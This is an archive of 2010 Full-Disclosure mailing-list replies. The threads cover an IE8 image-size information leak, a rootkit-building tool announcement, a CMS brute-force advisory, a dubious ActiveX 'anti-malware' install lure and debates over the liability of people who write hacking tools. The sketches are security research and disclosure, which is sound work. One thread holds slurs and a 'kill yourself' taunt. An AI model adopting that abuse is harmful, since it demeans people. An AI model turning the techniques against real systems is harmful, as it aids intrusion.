> some time now  and recently i found an exploit that can add the
> registry keys from a web browser.
>
> Hacxx Anti Malware for Windows XP blocks virus and worms using known
> filenames.
>
> To install it simply visit http:///antimalware.x10.bz and click in Run
> Hacxx Anti Malware.
> You must accept the ActiveX and the source is available in the site.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The_UT is repenting

[T Biehn]

I don't think UT is anyone's 'boy toy.' The guy is massive.

I'm sure he'll meet all kinds of experienced scam artists and criminals and
learn all sorts of neat things for use when he gets out.

-Travis

On Tue, Jun 1, 2010 at 6:13 AM, Anders Klixbull  wrote:

> I'm so sorry that your friend was retarded enough to get busted.
> And thank you for the archive!
> It's always nice to have a personal librarian :)
> You may be sorry for the repeat material, but please go suck a lemon.
> Thanks.
>
> -Oprindelig meddelelse-
> Fra: ghost [mailto:gho...@gmail.com]
> Sendt: 1. juni 2010 11:35
> Til: Anders Klixbull
> Cc: full-disclosure@lists.grok.org.uk
> Emne: Re: [Full-disclosure] The_UT is repenting
>
> Anders - i'm very sorry, you must of confused this mailing list with
> astalavista forums. Please go away... or kill yourself, whichever you
> prefer.. and in the interest of full-disclosure, I have my fingers
> crossed for the latter :)
>
> Thanks.
>
>
> -
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Please stop stating the obvious. Keep in mind that to us your useless
> replies are of no importance.
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> But their website graphics is super cool!
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> we care we really do From fulldisclosureboun...@list...
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> take a chill pill wigger
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> shut the fuck up From fulldisclosureboun...@list...
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> then you gadi and n3td3v should jump off a cliff
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Apology not accepted! Alcohol is required!
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> ) If im ever near there i will look you up! Cheers
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Thinking a little highly of yourself arent you? Saving the world lol
> lol lol Keep your moronic comics to yourself please
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> 0day pictures of Mark's mom for sale From fulldisclosureboun...@list...
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Keep your talentless tripe to yourself
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> You're obviously retarded
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> You forgot to include MiniMySqlat0r01.jar in your zip file..
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
>  !
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Free 0day for all!!
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Fuck the vendors put them on FD
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Go suck a lemon bitch
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> The hardcore cockgobbler scene of scotland
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> TEH TXT FIEL FORMATTING SI TEH FUCKED From fulldisclosureboun...@list...
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Religion is nothing more than mental crutches for weakminded people
>
> Message Results
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> But isnt that where you feel most at home brother n3td3v?
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Because we are drawn to you like moths to a flame
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> It's safe to assume that it covers the both of you ignorant turds
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Nice teenspeak maybe your mother can invite n3td3v over to hot cocoa
> and cookies?
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> removing anyone is pointless From fulldisclosureboun...@list...
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Project chroma project? Welcome to the redundancy department of
> redundancy.. Mike c aka n3td3v shut the fuck up
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> retardo
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Are you smoking crack?
>
> Re:
> by Anders Klixbull in full-disclosure@lists.

Re: [Full-disclosure] What do you guys think about it?

[T Biehn]

How is it open to debate?
He tells you where security as a career isn't dead. You act as a cog in the
SaaS machine. You research stuff.

The system admin who specializes in security has died and given way to the
specialized sys admin and a purely security oriented individual. The
security oriented individuals work for your sourcefires of the world.

-Travis


On Mon, May 31, 2010 at 5:14 PM, Christian Sciberras wrote:

> Regardless of merit, it is open to debate. Let's just hypothesize that it
> was.
>
> ;-)
>
>
>
>
> On Mon, May 31, 2010 at 6:23 PM, T Biehn  wrote:
>
>> If you thought this article had any merit then it is true for you.
>> Swap over to Hamburger University kids, nothing to see here.
>>
>> If you thought this article was bullshit then that is true for you.
>>
>> It's just too bad this wasn't by design, eh?
>>
>> -Travis
>>
>>
>> On Mon, May 31, 2010 at 12:04 PM, Georgi Guninski 
>> wrote:
>>
>>> why discriminate the gals?
>>>
>>> if we are lucky there may be a gal or 2 left on the nice list ;)
>>>
>>> On Fri, May 28, 2010 at 04:18:58PM -0300, Rafael Moraes wrote:
>>> > Read and give your opinion!
>>> >
>>> > http://www.networkworld.com/community/node/60303
>>> >
>>> > --
>>> > Att,
>>> > Rafael Moraes
>>> > Linux Professional Institute Certified - LPI 2
>>> > Novell Certified Linux Administrator - CLA
>>> > Data Center Technical Specialist - DCTS
>>> > ITIL Foundations Certified
>>>
>>> > ___
>>> > Full-Disclosure - We believe in it.
>>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> > Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>


-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] What do you guys think about it?

[T Biehn]

If you thought this article had any merit then it is true for you.
Swap over to Hamburger University kids, nothing to see here.

If you thought this article was bullshit then that is true for you.

It's just too bad this wasn't by design, eh?

-Travis

On Mon, May 31, 2010 at 12:04 PM, Georgi Guninski wrote:

> why discriminate the gals?
>
> if we are lucky there may be a gal or 2 left on the nice list ;)
>
> On Fri, May 28, 2010 at 04:18:58PM -0300, Rafael Moraes wrote:
> > Read and give your opinion!
> >
> > http://www.networkworld.com/community/node/60303
> >
> > --
> > Att,
> > Rafael Moraes
> > Linux Professional Institute Certified - LPI 2
> > Novell Certified Linux Administrator - CLA
> > Data Center Technical Specialist - DCTS
> > ITIL Foundations Certified
>
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] What are the basic vulnerabilities of a software?

[T Biehn]

Misuse, mis-implementation of cryptographic primitives.

Errors in state based code, skipping authentication states and moving to
authenticated states, for instance.

For everything else see whatever publication.

Why did I answer this :(

-Travis

On Mon, May 31, 2010 at 8:56 AM, Christian Sciberras wrote:

> 0. Human error.
>
>
>
>
>
>
>
> On Mon, May 31, 2010 at 11:50 AM, rajendra prasad <
> rajendra.paln...@gmail.com> wrote:
>
>> Hi List,
>> I am preparing a list of main and basic vulnerabilities in software.
>> Please let me know If you know other than the below list.
>> List of Basic Vulnerabilities:
>> 1. Buffer Overflow: Stack, Heap.
>> 2. Format String Vulnerabilities
>> 3. SQL Injections
>> 4. XSS Vulnerabilities
>>
>> Thanks
>> Rajendra Prasad.Palnaty
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Stealthier Internet access

[T Biehn]

Bipin;
Firstly: You know what you did.
Secondly: Screw you for not crediting the master.

(I am the master, you are the dog.)

Greetz & Love, Harmonious Profitability!

-Travis

On Wed, May 26, 2010 at 1:03 AM,  wrote:

> On Wed, 26 May 2010 10:15:32 +0545, Bipin Gautam said:
> > > it's a *bad* sector, so reading and recovering the data is a bitch...
> >
> > No, storing in Negative Disk, bad sector, stenography, slack space are
> > all bad places to store data!
>
> No, I meant it's usually not worth worrying that if the disk has done a
> hardware assignment of a replacement sector for a *real* live actual
> the-hardware-barfs-on-it bad sector, you can usually not worry about the
> contents of that bad sector, as the drive hardware won't let you access it
> directly anymore, redirecting you to the new replacement block.  So
> basically,
> somebody needs to take the disk apart and start doing the clean-room data
> recovery routine off the disk, trying to read 512 bytes of data at a time
> off
> known-physically-bad areas of the disk.
>
> And if your threat model includes adversaries that will do that, then
> you *really* need to be using full-disk encryption and thermite in your
> counter-defenses.  Oh, and a good countermeasure for rubber-hose crypto. ;)
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] JavaScript exploits via source code disclosure

[T Biehn]

A proxy or 'web-service firewall' prior to the 'protected' web service is
the correct answer.

Obfuscating the client code be it JavaScript, Interpreted (Java, CLR, etc)
or Native ignores the notion that the client controls hardware, OS, the
executing process and the network.

Signals can be intercepted at any layer.

Any other assertion is ridiculous and a waste of time and effort.

-Travis

On Thu, May 6, 2010 at 1:08 PM, Elazar Broad  wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Unless you wrap your service methods with some form of an
> authentication, your webservice's are just as public as any other
> "world" accessible part of your site. Are the pages calling these
> services behind any sort of authentication?
>
> On Thu, 06 May 2010 01:44:07 -0400 Ed Carp  wrote:
> >We've got a lot of JQuery code that calls back-end web services,
> >and
> >we're worried about exposing the web services to the outside world
> >-
> >anyone can "view source" and see exactly how we're calling our web
> >services.
> >
> >Are there any suggestions or guidelines regarding protecting one's
> >source from such disclosure?  Thanks in advance!
> >
> >___
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >Hosted and sponsored by Secunia - http://secunia.com/
> -BEGIN PGP SIGNATURE-
> Charset: UTF8
> Note: This signature can be verified at https://www.hushtools.com/verify
> Version: Hush 3.0
>
> wpwEAQECAAYFAkvi93MACgkQi04xwClgpZjfcgP/d0S5hyRlsAypsOue6A6HVLMpvTXT
> S3LyNJGpmoMcKAVRldWuIz5kP3dQ3BIHJEEdC1qKLwtSOEgAlxM/1XkMR7zhi4qJUzp0
> a2LisyC8k2xgWIYSfmiqG//tDWzME4EeYHZiGo0iK0fDPLLSwnad9+aeEdRdNI2vmfIc
> N6eQJeo=
> =4zuK
> -END PGP SIGNATURE-
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] go public to avoid jail

[T Biehn]

I once logged a guy on IRC who said he was going to packet me off the face
of the tubes.
So I sent my Mirc logs to the FBI when i lost my AOL connection.

He went to jail forever.

-Travis

On Mon, May 3, 2010 at 1:56 PM, J Roger  wrote:

> I can see that you have no experience with the legal system other than
>> what you've seen on TV (which is, to say, none at all).
>>
>
> I know this is the Internet but you don't need to be quite so rude. Perhaps
> I just haven't been arrested (caught) as many times as you have.
>
>
> If you read
>> the IRC logs presented by the prosecution, it is pretty clear what the
>> motive was.
>>
>
> I have not seen these IRC logs. Have you? Could you provide a reference for
> them please?
>
>
> JRoger
>
> On Mon, May 3, 2010 at 10:46 AM, Ed Carp  wrote:
>
>> I can see that you have no experience with the legal system other than
>> what you've seen on TV (which is, to say, none at all).  If you read
>> the IRC logs presented by the prosecution, it is pretty clear what the
>> motive was.  Your "release it to the public and you have no liability"
>> argument will land you in prison if you try it - go to any attorney
>> and ask.  Your emotional "prove Stephen is a saint" attempt at
>> twisting what happens in the legal system doesn't change the FACT that
>> the burden of proof was easily met by the prosecution and that the
>> defense's arguments, while designed to sway people more used to
>> emotional appeals than logic, did little to impress the court, with
>> very predictable results.
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] go public to avoid jail

[T Biehn]

Which is why this analogy is flawed.

-Travis

On Mon, May 3, 2010 at 12:27 PM, Marsh Ray  wrote:

>
> If your knife is found in a dead body, you've going to have some
> explaining to do.
>
> If it turns out that you're a restaurant supply business that sells 3000
> of that model knife a week, then you don't have a problem.
>
> If your buddy comes to you and says "I'm going to go stab some people
> and take their money will you construct for me a custom knife
> particularly well-suited for that purpose" and you say "sure, here you
> go, heh, no charge this time" and this conversation is recorded as
> evidence then both of you are going to get prosecuted.
>
> No one (seriously, no one) is going to be the least bit impressed by the
> "factories sell knives all the time" argument. The point is that you
> knew this specific knife was intended to be used in for this purpose and
> you decided to go out of your way to help.
>
> Hacking/pen-test tools can definitely push the gray area a bit, but the
> custom-knife-in-dead-body example does not.
>
> - Marsh
>
> On 5/3/2010 5:34 AM, Christian Sciberras wrote:
> > No, I'm being damn realistic. If it weren't me providing a knife to "my
> > buddy" it would be someone else, or some kitchen drawer.
> >
> > Also, why do I go to jail, not the shop owner that sold me the knife? Or
> the
> > factory owner?
> >
> > It's this guy that should be liable to the crime, not the provider.
> >
> >
> > On Mon, May 3, 2010 at 12:04 PM, Ed Carp  wrote:
> >
> >> Oh, stop it.  If you give your buddy a knife, knowing they're going to
> >> go out and stab someone with it, you're going to jail, too.  Stop
> >> playing the fool.
> >>
> >
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] go public to avoid jail

[T Biehn]

It's important to create a thriving market for these utilities, and as part
of the internet community to foster their development.
The 'malicious code' -> profit ecosystem is paramount to maintaining order
between corporate, governmental and public interests.

lol.

-Travis

On Mon, May 3, 2010 at 7:08 AM, Dietz Pröpper wrote:

> Ed Carp:
> > How about not writing a hacking tool in the first place that you know
> > will be used to rip other people off??  Wow...what a concept...OF
> > COURSE he knew the code he was writing was going to be used to rip
> > people off.
>
> How about closing mailing lists like the one you posted to?
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] go public to avoid jail

[T Biehn]

But he was a verified paypal buyer, your honor.
lols.
-Travis

On Thu, Apr 29, 2010 at 12:32 PM, Stephen Mullins <
steve.mullins.w...@gmail.com> wrote:

> That might work if you went through some sort of "official" channels
> with a bill of sale and so forth.  Claiming that you sold it to "some
> guy on irc" after a paypal payment cleared your account probably
> wouldn't be much of a defense in court.
>
> On Thu, Apr 29, 2010 at 12:05 PM, T Biehn  wrote:
> > Or you could just auction it off to the 'highest bidder.'
> >
> > -Travis
> >
> > On Tue, Apr 27, 2010 at 6:48 PM, J Roger 
> wrote:
> >>
> >> An important lesson from childhood, sharing, could help keep you out of
> >> jail.
> >>
> >> According to the following (dated) Wired article,
> >> http://www.wired.com/threatlevel/2009/12/stephen-watt/ Stephen Watt got
> >> screwed because he supplied his friend with a software tool he wrote and
> his
> >> friend used it to commit a crime.
> >>
> >> Had Stephen released his tool to the public (with as much or as little
> >> fanfare as he liked) would he still have gone to jail?
> >>
> >> He could make a good argument for legitimate uses of his tool as well.
> It
> >> would be useful for anyone performing a PCI penetration test in
> compliance
> >> with PCI DSS 11.3
> >>
> >> Remember kids, sharing is caring (that you not spend the next 2 years in
> >> federal prison)
> >>
> >> ___
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
> > --
> > FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
> >
> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
> > http://pastebin.com/f6fd606da
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] go public to avoid jail

[T Biehn]

Or you could just auction it off to the 'highest bidder.'

-Travis

On Tue, Apr 27, 2010 at 6:48 PM, J Roger  wrote:

> An important lesson from childhood, sharing, could help keep you out of
> jail.
>
> According to the following (dated) Wired article,
> http://www.wired.com/threatlevel/2009/12/stephen-watt/ Stephen Watt got
> screwed because he supplied his friend with a software tool he wrote and his
> friend used it to commit a crime.
>
> Had Stephen released his tool to the public (with as much or as little
> fanfare as he liked) would he still have gone to jail?
>
> He could make a good argument for legitimate uses of his tool as well. It
> would be useful for anyone performing a PCI penetration test in compliance
> with PCI DSS 11.3
>
> Remember kids, sharing is caring (that you not spend the next 2 years in
> federal prison)
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IE8 img tag HiJacking

[T Biehn]

Hey, you actually posted information! Congrats!
Did you learn about this 'information channel' from your numerous 'blackhat'
friends?

-Travis

On Apr 22, 2010 2:17 PM, "Dan Kaminsky"  wrote:

Also, Billy Hoffman has done a lot of fun work in this space, see
http://www.gnucitizen.org/blog/javascript-remoting-dangers/



2010/4/22 Dan Kaminsky :

> Interesting use, using filesize to back into the actual CAPTCHA used for a
> given query.  Sneaky!...
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IE8 img tag HiJacking

[T Biehn]

It could be used as a technique for defeating the login images used as
"two-factor-authentication" by some online services.
The application of using filesize to fingerprint an image is somewhat novel.
This is a decidedly 'old' vector, though.

-Travis

2010/4/21 Владимир Воронцов 

> Hello Full disclosure!
>
> Once again, unwinding theme HiJacking found a fun way to get the very
> least information about the target resource when the user is located at the
> attacker.
>
> Already crocked  tag opens new opportunities using the method
> fileSize, described here: http://msdn.microsoft.com/en-us/library/ms533752
> (v = VS.85). Aspx
>
> Consider a simple example - a Web application after authentication
> provides some sort of picture for the user, for example:
>
> http://example.com/getImage.php?image=myAvatar
>
> The attacker, knowing this can create a page to read:
>
> http://example.com/getImage.php?image=myAvatar";>
>
> 
>
> Thus, the attacker learns the simplest case, whether the target user
> access to example.com.
>
> Continuing the theme, I want to note that in some cases, can obtain
> additional information from the very values of the size of the picture. It
> can be any logical information Web applications, say, the same script can
> show administrators a picture of the same size, and users - of another.
> Thus, we obtain the user rights. And so on.
>
> I'd like to return the size of the method is not only "valid" images, but
> also HTML pages, JSON, etc. But, unfortunately, does not work. Maybe, of
> course, there are exceptions, call to investigate the matter.
>
> I have some thoughts on the study of vector images in XML format, because
> HTML is often valid XML, and then ...
>
> Check for the test version IE9, but he did not support SVG inside tag
> , but only as a separate tag.
>
> Works in IE8, in Opera 10.52 does not work on check writing, if not
> difficult.
>
> Original at russian language: http://oxod.ru/?p=113
>
> --
> Best regards,
> Vladimir Vorontsov
> ONsec security expert
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Tool] ReFrameworker 1.1

[T Biehn]

Awesome. A+ ruin.

2010/4/19 Erez Metula :
> Hi all,
> I'm happy to announce about a new version of ReFrameworker V1.1 !
>
> ReFrameworker is a general purpose Framework modifier, used to reconstruct
> framework Runtimes by creating modified versions from the original
> implementation that was provided by the framework vendor. ReFrameworker
> performs the required steps of runtime manipulation by tampering with the
> binaries containing the framework's classes, in order to produce modified
> binaries that can replace the original ones.
> It was developed to experiment with and demonstrate deployment of MCR
> (Managed Code Rootkits) code into a given framework. MCR is a special type
> of malicious code that is deployed inside an application level virtual
> machine such as those employed in managed code environment frameworks –
> Java, .NET, Dalvik, Python, etc..
> Having the full control of the managed code VM allows the MCR to lie to the
> upper level application running on top of it, and manipulate the application
> behavior to perform tasks not indented originally by the software developer.
> ReFrameworker was demonstrated (in his former incarnation as ".NET-Sploit")
> at BlackHat, Defcon, RSA, OWASP and other places. The new version will be
> demonstrated this week at SOURCE Boston conference, for the first time.
> More information on ReFrameworker and MCR will be available with the soon to
> be published book "Managed Code Rootkits", by Syngress publishing.
>
> Among its features:
> - Performs all the required steps needed for modifying framework binaries
> (disassemble, code injection, reassemble, precompiled images cleaning, etc.)
> - Fast development and deployment of a modified behavior into a given
> framework
> - Auto generated deployers
> - Modules: a separation between general purpose "building blocks" that can
> be injected into any given binary, allowing the users to create small pieces
> of code that can be later combined to form a specific injection task.
> - Can be easily adapted to support multiple frameworks by minimal
> configuration (currently comes preconfigured for the .NET framework)
> - Comes with many "preconfigured" proof-of-concept attacks (implemented as
> modules) that demonstrate its usage that can be easily extended to perform
> many other things.
>
> ReFrameworker, as a general purpose framework modification tool, can be used
> in other contexts besides security such as customizing frameworks for
> performance tuning, Runtime tweaking, virtual patching, hardening, and
> probably other usages - It all depends on what it is instructed to do.
>
> It can be downloaded from here:
> http://www.appsec.co.il/Managed_Code_Rootkits
>
> ---
> Erez Metula
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in TAK cms

[T Biehn]

lol.

On Thu, Apr 8, 2010 at 4:30 PM, Benji  wrote:
> nah, he'd be telling us how that was an easy way to find valid accounts.
>
> -Benji
>
> On Thu, Apr 8, 2010 at 6:30 PM, T Biehn  wrote:
>>
>> If there were an account lockout after 5 tries would you be telling us
>> about how there was a DOS vector on the same software?
>>
>> -Travis
>>
>> On Mon, Apr 5, 2010 at 4:35 PM, MustLive 
>> wrote:
>> > Hello Full-Disclosure!
>> >
>> > I want to warn you about security vulnerabilities in TAK cms. It's
>> > Ukrainian
>> > commercial CMS.
>> >
>> > -
>> > Advisory: Vulnerabilities in TAK cms
>> > -
>> > URL: http://websecurity.com.ua/4050/
>> > -
>> > Timeline:
>> > 04.02.2009 - found vulnerabilities.
>> > 30.09.2009 - informed owners of web sites where I found these
>> > vulnerabilities. Taking into account, that I didn't find any contact
>> > data of
>> > developer of TAK cms, then I hope, that owners of that site informed him
>> > about these vulnerabilities. This is one of those cases with commercial
>> > CMS,
>> > where developers didn't leave any contact data and there is no
>> > information
>> > about them in Internet.
>> > 19.03.2010 - disclosed at my site.
>> > -
>> > Details:
>> >
>> > These are Insufficient Anti-automation and Brute Force vulnerabilities.
>> >
>> > Insufficient Anti-automation:
>> >
>> > http://site/about/contacts/
>> > http://site/register/getpassword/
>> >
>> > At these pages there is not protection from automated requests
>> > (captcha).
>> >
>> > Brute Force:
>> >
>> > http://site/auth/
>> > http://site/admin/
>> >
>> > In login forms there is no protection from Brute Force attacks.
>> >
>> > Vulnerable are all versions of TAK cms.
>> >
>> > Best wishes & regards,
>> > MustLive
>> > Administrator of Websecurity web site
>> > http://websecurity.com.ua
>> >
>> > ___
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
